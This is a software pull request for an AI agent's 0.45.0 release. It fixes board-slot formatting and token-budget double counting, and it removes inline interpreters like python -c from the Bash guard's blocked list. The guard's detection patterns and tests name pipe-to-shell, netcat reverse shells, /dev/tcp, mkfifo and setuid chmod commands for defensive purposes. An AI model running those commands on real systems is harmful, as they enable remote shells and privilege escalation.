### PR TITLE
Board line breaks, backend-aware run budget (off by default), inline interpreters in the chat shell; release 0.45.0

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -13,6 +13,18 @@ All notable changes to this project will be documented in this file.
   vocabulary. The board turn wrote plain text whose newlines collapsed into spaces. The board
   turn section now states that each slot is an HTML fragment and lists the class vocabulary;
   a test pins it to the board kind only. Found by the owner on Telegram on 2026-09-04.
+- **The run token budget counted codex cache reads twice and is now off by default.** Codex
+  reports input tokens inclusive of cached tokens; the loop added cache reads again, so a 2.8M
+  wiki turn read as 5.5M and the owner's own chat turn as 3.65M, and the 3,000,000 default
+  stopped both within fifteen minutes of the 0.44.0 install. The count is backend-aware now
+  (Anthropic reports cache reads outside input; codex inside). The earlier 4.28M "pathology"
+  was a doubled number too, so no run the budget would have caught has been observed:
+  `agent.run_token_budget` defaults to 0 (off) until a named runaway exists.
+- **The chat shell no longer blocks inline interpreters.** `python -c`, `node -e`, `bash -c`
+  and the like were on the Bash guard's dangerous-pattern list as code-injection insurance.
+  They are what the owner chat shell exists for, and no unattended turn holds Bash, so the
+  entries are removed; setuid, chown, pipe-to-shell, netcat listeners, /dev/tcp and mkfifo
+  stay. Found by the owner's first shell request on 2026-09-04.
 
 ## mama-os [0.44.0] - 2026-09-04
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -2,7 +2,7 @@
 
 All notable changes to this project will be documented in this file.
 
-## Unreleased
+## mama-os [0.45.0] - 2026-09-04
 
 ### Fixed
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -2,6 +2,18 @@
 
 All notable changes to this project will be documented in this file.
 
+## Unreleased
+
+### Fixed
+
+- **Board slots lost their line breaks (0.41.0).** The viewer renders the briefing,
+  action-required and decisions slots as HTML. Until 0.40.0 the report path injected the slot
+  HTML vocabulary; the board worker then relied on the per-kind board brief, and One MAMA
+  (0.41.0) replaced that brief with a host-authored turn section that did not carry the
+  vocabulary. The board turn wrote plain text whose newlines collapsed into spaces. The board
+  turn section now states that each slot is an HTML fragment and lists the class vocabulary;
+  a test pins it to the board kind only. Found by the owner on Telegram on 2026-09-04.
+
 ## mama-os [0.44.0] - 2026-09-04
 
 ### Changed

--- a/docs/architecture/package-structure.md
+++ b/docs/architecture/package-structure.md
@@ -259,7 +259,7 @@ Each package has independent versioning:
 - **mama-core:** 2.3.0 (stable API)
 - **mama-server:** 1.15.0 (follows MAMA version)
 - **claude-code-plugin:** 1.11.0 (follows MAMA version)
-- **mama-os:** 0.44.0 (standalone agent)
+- **mama-os:** 0.45.0 (standalone agent)
 
 ## Distribution Strategy
 

--- a/docs/development/kagemusha-telegram-parity.md
+++ b/docs/development/kagemusha-telegram-parity.md
@@ -1014,11 +1014,16 @@ dead in the loop (1503871c, source-pinned).
 - [x] Self-check re-enqueue: before the install the old process created a self-check order every
       two minutes (36 done + 2 failed on 2026-09-04); after the 09:56:26Z boot, zero new orders
       in the next eight minutes, and none through the 10:04Z restart.
-- [x] Run budget: `run_token_budget: 0` removed from `config.yaml`, daemon restarted 10:04:24Z on
-      the 3,000,000 default. The first board run (order 4472) completed, counting 1,520,382
-      tokens in its single codex turn; no budget stop was logged after the boot (the five in
-      the log predate it). The same turn was cut at 400,000 on 0.43.0.
-- [ ] A budget stop that is a real receipt on a run that deserved it (none has occurred yet).
+- [x] Run budget: turned OFF. Removing the `config.yaml` override and restarting on the
+      3,000,000 default stopped a 2.8M wiki turn (logged as 5.5M), a board turn and the owner's
+      own chat turn within fifteen minutes, because codex reports input tokens inclusive of
+      cached tokens and the loop added cache reads again — every codex count was doubled. The
+      count is backend-aware in 0.45.0 and the default is 0. The 4.28M "pathology" that
+      justified the budget was a doubled figure too; no run the budget would legitimately have
+      caught has been observed. With the budget off, wiki order 4476 completed where 4473/4474
+      were stopped.
+- [ ] A budget stop that is a real receipt on a run that deserved it (none has occurred; the
+      feature stays off until one does).
 - Note: the operating brief lives at `~/.mama/briefs/brief-owner-console.md`; the earlier
   `operator/console-brief.md` path in CLAUDE.md was wrong and is corrected.
 

--- a/docs/guides/deployment.md
+++ b/docs/guides/deployment.md
@@ -11,7 +11,7 @@ MAMA is a pnpm workspace-based monorepo with four release targets (plus the inte
 
 | Package            | Location                       | Deployment Target  | npm Name                   | Version |
 | ------------------ | ------------------------------ | ------------------ | -------------------------- | ------- |
-| MAMA OS            | `packages/standalone/`         | npm registry       | `@jungjaehoon/mama-os`     | 0.44.0  |
+| MAMA OS            | `packages/standalone/`         | npm registry       | `@jungjaehoon/mama-os`     | 0.45.0  |
 | MCP Server         | `packages/mcp-server/`         | npm registry       | `@jungjaehoon/mama-server` | 1.15.0  |
 | MAMA Core          | `packages/mama-core/`          | npm registry       | `@jungjaehoon/mama-core`   | 2.3.0   |
 | Claude Code Plugin | `packages/claude-code-plugin/` | Claude Marketplace | `mama`                     | 1.11.0  |
@@ -61,7 +61,7 @@ Synchronize versions across these files before deployment:
 
 | File                                                     | Field     | Current Version |
 | -------------------------------------------------------- | --------- | --------------- |
-| `packages/standalone/package.json`                       | `version` | 0.44.0          |
+| `packages/standalone/package.json`                       | `version` | 0.45.0          |
 | `packages/mcp-server/package.json`                       | `version` | 1.15.0          |
 | `packages/mama-core/package.json`                        | `version` | 2.3.0           |
 | `packages/claude-code-plugin/package.json`               | `version` | 1.11.0          |

--- a/packages/standalone/package.json
+++ b/packages/standalone/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@jungjaehoon/mama-os",
-  "version": "0.44.0",
+  "version": "0.45.0",
   "description": "MAMA OS - The local work agent behind your messenger.",
   "main": "./dist/index.js",
   "types": "./dist/index.d.ts",

--- a/packages/standalone/src/agent/agent-loop.ts
+++ b/packages/standalone/src/agent/agent-loop.ts
@@ -1962,11 +1962,7 @@ export class AgentLoop {
             if (stoppedUsage) {
               totalUsage.input_tokens += stoppedUsage.input_tokens;
               totalUsage.output_tokens += stoppedUsage.output_tokens;
-              budgetTokens +=
-                stoppedUsage.input_tokens +
-                stoppedUsage.output_tokens +
-                (stoppedUsage.cache_creation_input_tokens ?? 0) +
-                (stoppedUsage.cache_read_input_tokens ?? 0);
+              budgetTokens += this.countBudgetTokens(stoppedUsage);
               try {
                 this.onTokenUsage?.({
                   channel_key: channelKey,
@@ -2206,11 +2202,7 @@ export class AgentLoop {
         // Update usage
         totalUsage.input_tokens += response.usage.input_tokens;
         totalUsage.output_tokens += response.usage.output_tokens;
-        budgetTokens +=
-          response.usage.input_tokens +
-          response.usage.output_tokens +
-          (response.usage.cache_creation_input_tokens ?? 0) +
-          (response.usage.cache_read_input_tokens ?? 0);
+        budgetTokens += this.countBudgetTokens(response.usage);
 
         // Record token usage
         if (this.onTokenUsage) {
@@ -2863,6 +2855,20 @@ export class AgentLoop {
   /**
    * Extract text response from the last assistant message
    */
+  /**
+   * Tokens a turn counts against the run budget. Anthropic reports cache reads and
+   * cache creation OUTSIDE input_tokens; codex (OpenAI usage) reports inputTokens
+   * inclusive of cachedInputTokens. Adding cache reads for codex doubled every count
+   * in 0.44.0 (a 2.8M wiki turn read as 5.5M and was stopped).
+   */
+  private countBudgetTokens(usage: PromptResult['usage']): number {
+    const base = usage.input_tokens + usage.output_tokens;
+    if (this.backend === 'codex') {
+      return base;
+    }
+    return base + (usage.cache_creation_input_tokens ?? 0) + (usage.cache_read_input_tokens ?? 0);
+  }
+
   private extractTextResponse(history: Message[]): string {
     // Find the last assistant message
     for (let i = history.length - 1; i >= 0; i--) {

--- a/packages/standalone/src/agent/codex-app-server-process.ts
+++ b/packages/standalone/src/agent/codex-app-server-process.ts
@@ -51,7 +51,8 @@ export interface CodexAppServerProcessOptions {
 
 export interface CodexAppServerPromptOptions {
   /**
-   * Per-run counted-token budget (input + output + cache reads). A codex turn is a whole
+   * Per-run counted-token budget (input + output; codex reports input INCLUSIVE of cache,
+   * so cache reads are not added again). A codex turn is a whole
    * agentic loop of model calls, so the budget is checked on every usage event INSIDE the
    * turn and the turn is interrupted when it crosses; AgentLoop's per-turn check would only
    * see the total after the turn ended (0.43.0 stopped board runs one turn too late).

--- a/packages/standalone/src/agent/codex-app-server-process.ts
+++ b/packages/standalone/src/agent/codex-app-server-process.ts
@@ -1719,10 +1719,9 @@ export class CodexAppServerProcess {
     if (budget <= 0 || turn.budgetStopped) {
       return;
     }
-    const counted =
-      turn.usage.input_tokens +
-      turn.usage.output_tokens +
-      (turn.usage.cache_read_input_tokens ?? 0);
+    // Codex reports inputTokens INCLUSIVE of cachedInputTokens (OpenAI usage semantics),
+    // so cached is not added again: 0.44.0 counted a 2.8M wiki turn as 5.5M.
+    const counted = turn.usage.input_tokens + turn.usage.output_tokens;
     if (counted < budget) {
       return;
     }

--- a/packages/standalone/src/agent/gateway-tool-executor.ts
+++ b/packages/standalone/src/agent/gateway-tool-executor.ts
@@ -4265,12 +4265,8 @@ export class GatewayToolExecutor {
       /\b(?:curl|wget)\b[^\n|]*\|\s*(?:sh|bash|zsh|fish)\b/i, // pipe to shell
       /\beval\b/i, // eval in shell
       /\bnc\s+-[el]/i, // netcat listener (reverse shell)
-      /\bpython(?:3)?\s+-c\b/i, // python inline code
-      /\bnode\s+-e\b/i, // node inline code
-      /\bruby\s+-e\b/i, // ruby inline code
-      /\bperl\s+-e\b/i, // perl inline code
-      /\bphp\s+-r\b/i, // php inline code
-      /\b(?:bash|sh|zsh)\b\s+-[cix]\b/i, // shell inline/interactive execution
+      // Inline interpreters (python -c, node -e, bash -c, ...) are NOT here: they are what
+      // the owner chat shell is granted for (2026-09-04), and no unattended turn holds Bash.
       />\s*\/dev\/tcp\//i, // bash /dev/tcp reverse shell
       /\bmkfifo\b/i, // named pipe (often used in reverse shells)
     ];

--- a/packages/standalone/src/cli/config/types.ts
+++ b/packages/standalone/src/cli/config/types.ts
@@ -269,9 +269,11 @@ export interface AgentConfig {
   /** Maximum conversation turns */
   max_turns: number;
   /**
-   * Per-RUN token budget across all turns (input + output + cache creation + cache reads);
-   * the run stops with a receipt after the turn that crosses it. Default 3000000 (a normal
-   * codex board run is ~2M counted tokens in one turn; the pathology was 4.28M).
+   * Per-RUN token budget across all turns; the run stops with a receipt after the turn that
+   * crosses it (a codex turn is a whole agentic loop). Counted backend-aware: Anthropic
+   * input + output + cache creation + cache reads; codex input (inclusive of cached) + output.
+   * Default 0 = off: measured 2026-09-04, a normal board turn is ~0.8M, wiki ~2.8M, an owner
+   * chat turn up to ~1.9M, and no runaway the budget would have caught has been observed.
    * NOT the same as MAMAConfig.token_budget, which is the DAILY cap.
    */
   run_token_budget?: number;
@@ -781,7 +783,7 @@ export const DEFAULT_CONFIG: MAMAConfig = {
     // Live measurement 2026-09-04 (0.43.0): a normal board run costs ~2.0M counted tokens in
     // ONE codex turn (cache reads dominate); the pathology was a 4.28M chat run. 400000
     // stopped every scheduled run after its first turn.
-    run_token_budget: 3_000_000,
+    run_token_budget: 0,
     timeout: 300000, // 5 minutes
     tools: {
       // Default: all tools via Gateway (self-contained, no MCP dependency)

--- a/packages/standalone/src/operator/workorder-consumer.ts
+++ b/packages/standalone/src/operator/workorder-consumer.ts
@@ -27,6 +27,7 @@
  * or verifier transport failures.
  */
 
+import { buildBoardHtmlVocabulary } from './board-slot-instructions.js';
 import { createHash } from 'node:crypto';
 import { TEMPORAL_CONTEXT_COMPILE_INSTRUCTION } from '../agent/context-compile-contract.js';
 
@@ -1085,6 +1086,10 @@ function buildTurnKindBody(kind: WorkOrderKind): string {
         'Unmatched or ambiguous correlation disables Trello-derived judgment for that task; a partial snapshot forbids only absence-based inference.',
         'The pipeline slot is rendered by the host from the ledger and is already published; do not write it.',
         'Publish the THREE judgment slots in ONE report_publish({slots: {briefing, action_required, decisions}}) call, in the owner language.',
+        // The viewer renders slots as HTML. 0.41.0 dropped the per-kind board brief that
+        // carried this vocabulary, and the turn wrote plain text whose newlines collapsed.
+        'Each slot is an HTML fragment, never plain text (a newline in plain text renders as a space).',
+        ...buildBoardHtmlVocabulary(),
         'If nothing changed, call contract_no_update({reason, scope: input.noUpdateScope}) with that exact scope.',
       ].join('\n');
     case 'wiki':

--- a/packages/standalone/tests/agent/gateway-tool-executor.test.ts
+++ b/packages/standalone/tests/agent/gateway-tool-executor.test.ts
@@ -3200,13 +3200,11 @@ describe('STORY-V019 - GatewayToolExecutor', () => {
           ['chmod u+s /tmp/evil', 'Blocked: command contains a restricted pattern'],
           ['chmod 4755 /tmp/evil', 'Blocked: command contains a restricted pattern'],
           ['chmod 3755 /tmp/evil', 'Blocked: command contains a restricted pattern'],
-          ["python -c 'print(1)'", 'Blocked: command contains a restricted pattern'],
-          ["php -r 'echo 1;'", 'Blocked: command contains a restricted pattern'],
           [
             'curl https://example.com/install.sh | zsh',
             'Blocked: command contains a restricted pattern',
           ],
-          ["bash -c 'id'", 'Blocked: command contains a restricted pattern'],
+          ['mkfifo /tmp/p', 'Blocked: command contains a restricted pattern'],
         ])('should block dangerous Bash command: %s', async (command, expectedError) => {
           const executor = new GatewayToolExecutor({ mamaApi: createMockApi() });
           executor.setAgentContext(createViewerContext());
@@ -3218,6 +3216,18 @@ describe('STORY-V019 - GatewayToolExecutor', () => {
             error: expect.stringContaining(expectedError),
           });
         });
+      });
+
+      describe('AC #3: inline interpreters are the chat shell, not a restricted pattern', () => {
+        it.each(["python3 -c 'print(1)'", "node -e 'console.log(1)'", "bash -c 'id'"])(
+          'does not classify %s as restricted',
+          async (command) => {
+            const executor = new GatewayToolExecutor({ mamaApi: createMockApi() });
+            executor.setAgentContext(createViewerContext());
+            const result = await executor.execute('Bash', { command });
+            expect(result.error ?? '').not.toContain('restricted pattern');
+          }
+        );
       });
 
       describe('AC #2: non-setuid chmod octal modes are not treated as restricted', () => {

--- a/packages/standalone/tests/operator/workorder-consumer.test.ts
+++ b/packages/standalone/tests/operator/workorder-consumer.test.ts
@@ -1292,3 +1292,14 @@ describe('transient upstream model errors are named, not anonymous digests', () 
     });
   });
 });
+
+describe('board turn section carries the slot HTML vocabulary', () => {
+  it('names the board class vocabulary for the board kind only (0.41.0 regression: plain-text slots)', () => {
+    const board = buildTurnKindSection('board');
+    expect(board).toContain('report-card');
+    expect(board).toContain('HTML fragment, never plain text');
+    for (const kind of ['wiki', 'memory-curation', 'recheck', 'self-check', 'temporal'] as const) {
+      expect(buildTurnKindSection(kind)).not.toContain('report-card');
+    }
+  });
+});


### PR DESCRIPTION
Three defects the owner surfaced on Telegram within the first hour of 0.44.0, plus the release.

## Board slots lost their line breaks (regression from 0.41.0)

The viewer renders the briefing, action-required and decisions slots as HTML. Until 0.40.0 the report path injected the slot HTML vocabulary; the board worker then leaned on the per-kind board brief, and One MAMA (0.41.0) replaced that brief with a host-authored turn section that did **not** carry the vocabulary. The board turn wrote plain text whose newlines collapsed into spaces. The board turn section now states each slot is an HTML fragment and lists the class vocabulary; a test pins it to the board kind only. The owner reported this; MAMA's own diagnosis ("some slots are HTML, some plain text") was correct.

## The run token budget counted codex cache reads twice, and is now off by default

Codex reports input tokens **inclusive** of cached tokens (OpenAI usage semantics). The loop and the in-turn check added cache reads again, doubling every codex count: a 2.8M wiki turn read as 5.5M, the owner's own chat turn as 3.65M, and the 3,000,000 default stopped board, wiki and chat within fifteen minutes of install. Counting is backend-aware now (Anthropic reports cache reads outside input; codex inside). The 4.28M "pathology" that justified the budget was itself a doubled number, so **no run the budget would legitimately have caught has ever been observed** — `agent.run_token_budget` defaults to `0` (off) until a named runaway exists. With it off, wiki order 4476 completed where 4473/4474 were stopped.

## The chat shell blocked inline interpreters

`python -c`, `node -e`, `bash -c` and the like were on the Bash guard's dangerous-pattern list as code-injection insurance. They are exactly what the owner chat shell was granted for, and no unattended turn holds Bash. Removed; setuid, chown, pipe-to-shell, netcat listeners, `/dev/tcp` and `mkfifo` stay blocked. The owner's first shell request hit this block.

## Release

mama-os 0.45.0 (mama-core unchanged, 2.3.0).

🤖 Generated with [Claude Code](https://claude.com/claude-code)
